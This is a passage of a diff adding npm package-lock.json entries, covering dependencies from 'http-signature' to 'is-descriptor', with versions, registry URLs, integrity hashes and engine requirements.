"sha512-gwsOE28k+23GP1B6vFl1oVh/WOzmawBrKwo5Ev6wMKzPkaXaCDIQKzLnvsA42DRlbVTWorkgTKIviAKCWkfUwA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + 
"node_modules/http-signature": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", + "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^1.2.2", + "sshpk": "^1.7.0" + }, + "engines": { + "node": ">=0.8", + "npm": ">=1.3.7" + } + }, + "node_modules/http-signature/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/http-status": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/http-status/-/http-status-1.5.0.tgz", + "integrity": "sha512-wcGvY31MpFNHIkUcXHHnvrE4IKYlpvitJw5P/1u892gMBAM46muQ+RH7UN1d+Ntnfx5apnOnVY6vcLmrWHOLwg==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/https-proxy-agent": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.0.tgz", + "integrity": "sha512-EkYm5BcKUGiduxzSt3Eppko+PiNWNEpa4ySk9vTC6wDsQJW9rHSa+UhGNJoRYp7bz6Ht1eaRIa6QaJqO5rCFbA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/human-signals": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-1.1.1.tgz", + "integrity": "sha512-SEQu7vl8KjNL2eoGBLF3+wAjpsNfA9XMlXAYj/3EdaNfAlxKthD1xjEQfGOUhllCGGJVNY34bRr6lPINhNjyZw==", + "dev": true, + "engines": { + "node": ">=8.12.0" + } + }, + "node_modules/hyperdyperid": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hyperdyperid/-/hyperdyperid-1.2.0.tgz", + "integrity": "sha512-Y93lCzHYgGWdrJ66yIktxiaGULYc6oGiABxhcO5AufBeOyoIdZF7bIfLaOrbM0iGIOXQQgxxRrFEnb+Y6w1n4A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10.18" + } + }, + "node_modules/hyphenate-style-name": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/hyphenate-style-name/-/hyphenate-style-name-1.0.4.tgz", + "integrity": "sha512-ygGZLjmXfPHj+ZWh6LwbC37l43MhfztxetbFCoYTM2VjkIUpeHgSNn7QIyVFj7YQ1Wl9Cbw5sholVJPzWvC2MQ==" + }, + "node_modules/i18next": { + "version": "23.10.0", + "resolved": "https://registry.npmjs.org/i18next/-/i18next-23.10.0.tgz", + "integrity": "sha512-/TgHOqsa7/9abUKJjdPeydoyDc0oTi/7u9F8lMSj6ufg4cbC1Oj3f/Jja7zj7WRIhEQKB7Q4eN6y68I9RDxxGQ==", + "funding": [ + { + "type": "individual", + "url": "https://locize.com" + }, + { + "type": "individual", + "url": "https://locize.com/i18next.html" + }, + { + "type": "individual", + "url": "https://www.i18next.com/how-to/faq#i18next-is-awesome.-how-can-i-support-the-project" + } + ], + "dependencies": { + "@babel/runtime": "^7.23.2" + } + }, + "node_modules/i18next-fs-backend": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/i18next-fs-backend/-/i18next-fs-backend-2.3.1.tgz", + "integrity": "sha512-tvfXskmG/9o+TJ5Fxu54sSO5OkY6d+uMn+K6JiUGLJrwxAVfer+8V3nU8jq3ts9Pe5lXJv4b1N7foIjJ8Iy2Gg==" + }, + "node_modules/i18next-http-middleware": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/i18next-http-middleware/-/i18next-http-middleware-3.5.0.tgz", + "integrity": "sha512-BqATaFCMVHJYZX4cBmhvpBqZNvnvjjmcSzxJvLWTwgJ4gn5kwYoyVikn7AB5kxiQrFjSuZsjDFv76CdsAHwpZw==" + }, + "node_modules/i18next-scanner": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/i18next-scanner/-/i18next-scanner-4.4.0.tgz", + "integrity": 
"sha512-bgnVEfoFHLVxfXNQtsFFzexB/5kwgDZZkZ6+AnCmyaFKEQQbtMkgPgLHlMZ0deIIEG6KN/tYAus5ZJzng2Ac9g==", + "dev": true, + "dependencies": { + "acorn": "^8.0.4", + "acorn-jsx": "^5.3.1", + "acorn-stage3": "^4.0.0", + "acorn-walk": "^8.0.0", + "chalk": "^4.1.0", + "clone-deep": "^4.0.0", + "commander": "^9.0.0", + "deepmerge": "^4.0.0", + "ensure-type": "^1.5.0", + "eol": "^0.9.1", + "esprima-next": "^5.7.0", + "gulp-sort": "^2.0.0", + "i18next": "*", + "lodash": "^4.0.0", + "parse5": "^6.0.0", + "sortobject": "^4.0.0", + "through2": "^4.0.0", + "vinyl": "^3.0.0", + "vinyl-fs": "^4.0.0" + }, + "bin": { + "i18next-scanner": "bin/cli.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/i18next-scanner/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/i18next-scanner/node_modules/acorn-walk": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-8.2.0.tgz", + "integrity": "sha512-k+iyHEuPgSw6SbuDpGQM+06HQUa04DZ3o+F6CSzXMvvI5KMvnaEqXe+YVe555R9nn6GPt404fos4wcgpw12SDA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/i18next-scanner/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/i18next-scanner/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/i18next-scanner/node_modules/commander": { + "version": "9.5.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-9.5.0.tgz", + "integrity": "sha512-KRs7WVDKg86PWiuAqhDrAQnTXZKraVcCc6vFdL14qrZ/DcWwuRo7VoiYXalXO7S5GKpqYiVEwCbgFDfxNHKJBQ==", + "dev": true, + "engines": { + "node": "^12.20.0 || >=14" + } + }, + "node_modules/i18next-scanner/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/iconv-lite": { + "version": "0.4.24", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/icss-utils": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/icss-utils/-/icss-utils-5.1.0.tgz", + "integrity": 
"sha512-soFhflCVWLfRNOPU3iv5Z9VUdT44xFRbzjLsEzSr5AQmgqPMTHdU3PMT1Cf1ssx8fLNJDA1juftYl+PUcv3MqA==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/ieee754": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.1.13.tgz", + "integrity": "sha512-4vf7I2LYV/HaWerSo3XmlMkp5eZ83i+/CDluXi/IGTs/O1sejBNhTtnxzmRZfvOUqj7lZjqHkeTvpgSFDlWZTg==" + }, + "node_modules/ignore": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.3.1.tgz", + "integrity": "sha512-5Fytz/IraMjqpwfd34ke28PTVMjZjJG2MPn5t7OE4eUCUNf8BAa7b5WUS9/Qvr6mwOQS7Mk6vdsMno5he+T8Xw==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/ignore-by-default": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/ignore-by-default/-/ignore-by-default-1.0.1.tgz", + "integrity": "sha512-Ius2VYcGNk7T90CppJqcIkS5ooHUZyIQK+ClZfMfMNFEF9VSE73Fq+906u/CWu92x4gzZMWOwfFYckPObzdEbA==", + "dev": true + }, + "node_modules/image-size": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/image-size/-/image-size-0.5.5.tgz", + "integrity": "sha1-Cd/Uq50g4p6xw+gLiZA3jfnjy5w=", + "dev": true, + "optional": true, + "bin": { + "image-size": "bin/image-size.js" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/immutable": { + "version": "4.3.5", + "resolved": "https://registry.npmjs.org/immutable/-/immutable-4.3.5.tgz", + "integrity": "sha512-8eabxkth9gZatlwl5TBuJnCsoTADlL6ftEr7A4qgdaTsPyreilDSnUk57SO+jfKcNtxPa22U5KK6DSeAYhpBJw==", + "dev": true + }, + "node_modules/import-fresh": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", + "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/import-fresh/node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "engines": { + "node": ">=4" + } + }, + "node_modules/import-in-the-middle": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/import-in-the-middle/-/import-in-the-middle-1.4.2.tgz", + "integrity": "sha512-9WOz1Yh/cvO/p69sxRmhyQwrIGGSp7EIdcb+fFNVi7CzQGQB8U1/1XrKVSbEd/GNOAeM0peJtmi7+qphe7NvAw==", + "dependencies": { + "acorn": "^8.8.2", + "acorn-import-assertions": "^1.9.0", + "cjs-module-lexer": "^1.2.2", + "module-details-from-path": "^1.0.3" + } + }, + "node_modules/import-in-the-middle/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/import-in-the-middle/node_modules/acorn-import-assertions": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/acorn-import-assertions/-/acorn-import-assertions-1.9.0.tgz", + "integrity": "sha512-cmMwop9x+8KFhxvKrKfPYmN6/pKTYYHBqLa0DfvVZcKMJWNyWLnaqND7dx/qn66R7ewM1UX5XMaDVP5wlVTaVA==", + "peerDependencies": { + "acorn": "^8" + } + }, + "node_modules/import-local": { + 
"version": "3.1.0", + "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", + "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", + "dev": true, + "dependencies": { + "pkg-dir": "^4.2.0", + "resolve-cwd": "^3.0.0" + }, + "bin": { + "import-local-fixture": "fixtures/cli.js" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", + "engines": { + "node": ">=0.8.19" + } + }, + "node_modules/indent-string": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", + "integrity": "sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/inflection": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/inflection/-/inflection-1.13.4.tgz", + "integrity": "sha512-6I/HUDeYFfuNCVS3td055BaXBwKYuzw7K3ExVMStBowKo9oOAMJIXIHvdyR3iboTCp1b+1i5DSkIZTcwIktuDw==", + "engines": [ + "node >= 0.4.0" + ] + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/ini": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", + "dev": true + }, + "node_modules/install": { + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/install/-/install-0.13.0.tgz", + "integrity": "sha512-zDml/jzr2PKU9I8J/xyZBQn8rPCAY//UOYNmR01XwNwyfhEWObo2SWfSl1+0tm1u6PhxLwDnfsT/6jB7OUxqFA==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/internal-slot": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/internal-slot/-/internal-slot-1.0.7.tgz", + "integrity": "sha512-NGnrKwXzSms2qUUih/ILZ5JBqNTSa1+ZmP6flaIp6KmSElgE9qdndzS3cqjrDovwFdmwsGsLdeFgB6suw+1e9g==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "hasown": "^2.0.0", + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/interpret": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/interpret/-/interpret-2.2.0.tgz", + "integrity": "sha512-Ju0Bz/cEia55xDwUWEa8+olFpCiQoypjnQySseKtmjNrnps3P+xfpUmGr90T7yjlVJmOtybRvPXhKMbHr+fWnw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/invariant": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/invariant/-/invariant-2.2.4.tgz", + "integrity": "sha512-phJfQVBuaJM5raOpJjSfkiD6BpbCE4Ns//LaXl6wGYtUBY83nWS6Rf9tXm2e8VaK60JEjYldbPif/A2B1C2gNA==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/ioredis": { + "version": "4.27.11", + "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-4.27.11.tgz", + "integrity": 
"sha512-qBU2uCHgRs4kJT/qzxeFhbmizmNLQ1HH59EvKt1WnzDPMjjWxZS1+W6ynXdE47TxxqNLKYemJxEXXUb7Y4JJ+w==", + "dependencies": { + "cluster-key-slot": "^1.1.0", + "debug": "^4.3.1", + "denque": "^1.1.0", + "lodash.defaults": "^4.2.0", + "lodash.flatten": "^4.4.0", + "lodash.isarguments": "^3.1.0", + "p-map": "^2.1.0", + "redis-commands": "1.7.0", + "redis-errors": "^1.2.0", + "redis-parser": "^3.0.0", + "standard-as-callback": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/ioredis" + } + }, + "node_modules/ioredis/node_modules/p-map": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-2.1.0.tgz", + "integrity": "sha512-y3b8Kpd8OAN444hxfBbFfj1FY/RjtTd8tzYwhUqNYXx0fXx2iX4maP4Qr6qhIKbQXI02wTLAda4fYUbDagTUFw==", + "engines": { + "node": ">=6" + } + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "optional": true, + "peer": true, + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/ip-address/node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "optional": true, + "peer": true + }, + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "optional": true, + "peer": true + }, + "node_modules/ip-regex": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-2.1.0.tgz", + "integrity": "sha1-+ni/XS5pE8kRzp+BnuUUa7bYROk=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/ip6addr": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/ip6addr/-/ip6addr-0.2.5.tgz", + "integrity": "sha512-9RGGSB6Zc9Ox5DpDGFnJdIeF0AsqXzdH+FspCfPPaU/L/4tI6P+5lIoFUFm9JXs9IrJv1boqAaNCQmoDADTSKQ==", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2" + } + }, + "node_modules/ip6addr/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ip6addr/node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/ipaddr.js": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", + "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/is/-/is-3.3.0.tgz", + "integrity": 
"sha512-nW24QBoPcFGGHJGUwnfpI7Yc5CdqWNdsyHQszVE/z2pKHXzh7FZ5GWhJqSyaQ9wMkQnsTx+kAI8bHlCX4tKdbg==", + "engines": { + "node": "*" + } + }, + "node_modules/is-absolute-url": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-absolute-url/-/is-absolute-url-3.0.3.tgz", + "integrity": "sha512-opmNIX7uFnS96NtPmhWQgQx6/NYFgsUXYMllcfzwWKUMwfo8kku1TvE6hkNcH+Q1ts5cMVrsY7j0bxXQDciu9Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-accessor-descriptor": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-accessor-descriptor/-/is-accessor-descriptor-1.0.1.tgz", + "integrity": "sha512-YBUanLI8Yoihw923YeFUS5fs0fF2f5TSFTNiYAAzhhDscDa3lEqYuz1pDOEP5KvX94I9ey3vsqjJcLVFVU+3QA==", + "dev": true, + "dependencies": { + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is-arguments": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.1.1.tgz", + "integrity": "sha512-8Q7EARjzEnKpt/PCD7e1cgUS0a6X8u5tdSiMqXhojOdoV9TsMsiO+9VLC5vAmO8N7/GmXn7yjR8qnA6bVAEzfA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-array-buffer": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.4.tgz", + "integrity": "sha512-wcjaerHw0ydZwfhiKbXJWLDY8A7yV7KhjQOpb83hGgGfId/aQa4TOvwyzn2PuswW2gPCYEL/nEAiSVpdOj1lXw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-arrayish": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", + "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", + "dev": true + }, + "node_modules/is-arrow-function": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-arrow-function/-/is-arrow-function-2.0.3.tgz", + "integrity": "sha512-iDStzcT1FJMzx+TjCOK//uDugSe/Mif/8a+T0htydQ3qkJGvSweTZpVYz4hpJH0baloSPiAFQdA8WslAgJphvQ==", + "dev": true, + "dependencies": { + "is-callable": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-async-function": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-async-function/-/is-async-function-2.0.0.tgz", + "integrity": "sha512-Y1JXKrfykRJGdlDwdKlLpLyMIiWqWvuSd17TvZk68PLAOGOoF4Xyav1z0Xhoi+gCYjZVeC5SI+hYFOfvXmGRCA==", + "dev": true, + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bigint": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-bigint/-/is-bigint-1.0.4.tgz", + "integrity": "sha512-zB9CruMamjym81i2JZ3UMn54PKGsQzsJeo6xvN3HJJ4CAsQNB6iRutp2To77OfCNuoxspsIhzaPoO1zyCEhFOg==", + "dependencies": { + "has-bigints": "^1.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-binary-path": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", + "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", + "dev": true, + "dependencies": { + "binary-extensions": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-boolean-object": { + "version": 
"1.1.2", + "resolved": "https://registry.npmjs.org/is-boolean-object/-/is-boolean-object-1.1.2.tgz", + "integrity": "sha512-gDYaKHJmnj4aWxyj6YHyXVpdQawtVLHU5cb+eztPGczf6cjuTdwve5ZIEfgXqH4e57An1D1AKf8CZ3kYrQRqYA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-buffer": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/is-buffer/-/is-buffer-1.1.6.tgz", + "integrity": "sha512-NcdALwpXkTm5Zvvbk7owOUSvVvBKDgKP5/ewfXEznmQFfs4ZRmanOeKBTjRVjka3QFoN6XJ+9F3USqfHqTaU5w==", + "dev": true + }, + "node_modules/is-builtin-module": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/is-builtin-module/-/is-builtin-module-3.2.1.tgz", + "integrity": "sha512-BSLE3HnV2syZ0FK0iMA/yUGplUeMmNz4AW5fnTunbCIqZi4vG3WjJT9FHMy5D69xmAYBHXQhJdALdpwVxV501A==", + "dev": true, + "dependencies": { + "builtin-modules": "^3.3.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-callable": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/is-callable/-/is-callable-1.2.7.tgz", + "integrity": "sha512-1BC0BVFhS/p0qtw6enp8e+8OD0UrK0oFLztSjNzhcKA3WDuJxxAPXzPuPtKkjEY9UUoEWlX/8fgKeu2S8i9JTA==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-core-module": { + "version": "2.13.1", + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", + "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", + "dependencies": { + "hasown": "^2.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-data-descriptor": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-data-descriptor/-/is-data-descriptor-1.0.1.tgz", + "integrity": "sha512-bc4NlCDiCr28U4aEsQ3Qs2491gVq4V8G7MQyws968ImqjKuYtTJXrl7Vq7jsN7Ly/C3xj5KWFrY7sHNeDkAzXw==", + "dev": true, + "dependencies": { + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-data-view": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-data-view/-/is-data-view-1.0.1.tgz", + "integrity": "sha512-AHkaJrsUVW6wq6JS8y3JnM/GJF/9cf+k20+iDzlSaJrinEo5+7vRiteOSwBhHRiAyQATN1AmY4hwzxJKPmYf+w==", + "license": "MIT", + "dependencies": { + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-date-object": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/is-date-object/-/is-date-object-1.0.5.tgz", + "integrity": "sha512-9YQaSxsAiSwcvS33MBk3wTCVnWK+HhF8VZR2jRxehM16QcVOdHqPn4VPHmRK4lSr38n9JriurInLcP90xsYNfQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-descriptor": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-1.0.3.tgz", + "integrity": "sha512-JCNNGbwWZEVaSPtS45mdtrneRWJFp07LLmykxeFV5F6oBvNF8vHSfJuJgoT472pSfk+Mf8VnlrspaFBHWM8JAw==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + 